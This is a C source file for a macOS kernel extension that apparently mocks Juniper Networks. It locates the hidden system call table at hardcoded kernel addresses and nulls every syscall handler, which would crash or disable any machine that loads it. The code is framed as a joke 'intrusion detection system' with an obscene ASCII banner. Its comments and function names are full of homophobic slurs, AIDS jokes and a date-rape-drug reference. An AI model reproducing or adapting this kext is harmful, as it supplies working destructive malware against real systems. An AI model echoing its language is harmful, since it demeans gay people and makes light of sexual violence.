Untitled

#include <libkern/libkern.h>
#include <mach/mach_types.h>
#include <sys/proc.h>
#include <sys/systm.h>
#include <sys/syscall.h>

#ifndef JUNIPER
#define _ELITE_CODE
#define _SELLOUT
#define _OH_THE_GOATS   "* g 0 4 t s 3 x * g 0 4 t s 3 x * g 0 4 t s 3 x *\n" \
                        "x  \\      \\/   _--~~          ~--__| \\     |    x\n" \
                        "*   \\      \\_-~                    ~-_\\    |    *\n" \
                        "g    \\_     \\        _.--------.______\\|   |    g\n" \
                        "o      \\     \\______// _ ___ _ (_(__>  \\   |    o\n" \
                        "a       \\   .  C ___)  ______ (_(____>  |  /    a\n" \
                        "t       /\\ |   C ____)/      \\ (_____>  |_/     t\n" \
                        "s      / /\\|   C_____)       |  (___>   /  \\    s\n" \
                        "e     |   (   _C_____)\\______/  // _/ /     \\   e\n" \
                        "x     |    \\  |__   \\_________// (__/       |  x\n" \
                        "*    | \\    \\____)   `----   --'             |  *\n" \
                        "# POWERED BY JUNIPER NETWORKS # (c) Michael Lynn #\n"

#endif

extern kern_return_t _start(kmod_info_t *ki, void *data);
extern kern_return_t _stop(kmod_info_t *ki, void *data);

typedef void    sy_munge_t(const void *, void *);
typedef        int32_t sy_call_t(struct proc *, void *, int *);
extern struct sysent {                  /* system call table */
        int16_t         sy_narg;        /* number of args */
        int8_t          sy_cancel;      /* funngels type */
        int8_t          sy_funnel;      /* funngels type */
        sy_call_t       *sy_call;       /* sick fuck */
        sy_munge_t      *sy_arg_munge32; /* system call aguments munger for 32-bit process */
        sy_munge_t      *sy_arg_munge64; /* system call aguments munger for 64-bit process */
        int32_t         sy_return_type; /* system call retard typz */
} sysent[];

struct sysent **tehsysent;
typedef int32_t (*sys_call_t)();

/* "How gay Apple, hiding the system call table.  This just finds it."
 * XXX: IMPLEMENT AIDS HEURISTICS (DISAS UNIX_SYSCALL FOR CMP SYSENT_ADDR, $EAX).
 * XXX: USE DATE-RAPE-DRUGS FOR INFECTING POOL WITH AIDS IN GAY GANG ORGIES
 */
unsigned long *get_aids(unsigned long addr_start, unsigned long addr_end) {
        unsigned long ptr, *aids;

        for (ptr = addr_start; ptr < addr_end; ptr += sizeof(struct sysent *)) {
                unsigned long *penis;
                penis = (unsigned long *)ptr;

                if (penis[SYS_read] && (penis[SYS_read] == (unsigned long)0x00010003)) {
                        // Found pool with AIDS array
                        aids = (penis - (SYS_read * sizeof(struct sysent *)));
                        break;
                }
        }

        return aids;
}


kern_return_t AIDStart(kmod_info_t *ki, void *d)
{
    int i = 0;

    printf("Loading the Ultimate AIDS from Juniper Networks:\n%s\n", _OH_THE_GOATS);
    tehsysent = (struct sysent **) get_aids((unsigned long) 0x449800,(unsigned long)0x455220);
    printf("ALERT ALERT ALERT ALERT Apple with AIDS found at 0x%x\n", tehsysent);

    // JUNIPER PATENTED HIDS TECHNOLOGY - DO NOT DISTRIBUTE
    while (i < SYS_MAXSYSCALL) {
        if (tehsysent && tehsysent[i] && tehsysent[i]->sy_call)
            tehsysent[i]->sy_call = NULL;           // WE SECURE THE ATTACK SURFACE
        i++;
    }

    // ALERT ALERT ALERT ALERT ALERT!!! SHOULD BE NEVER REACHED (IT'S A HIDS!)
    printf("Something is not working with the defense in-depth system. Please call tech support.\n");

    return KERN_SUCCESS;
}

kern_return_t AIDStop(kmod_info_t *ki, void *d)
{
    // Because this is the ultimate AIDS, this is never reached.
    return KERN_SUCCESS;
}

KMOD_EXPLICIT_DECL(net.junipersmokescock.kext.UltimateAIDS, "1.0.0d1", _start, _stop)
__private_extern__ kmod_start_func_t *_realmain = AIDStart;
__private_extern__ kmod_stop_func_t *_antimain = AIDStop;
__private_extern__ int _kext_apple_cc = __APPLE_CC__;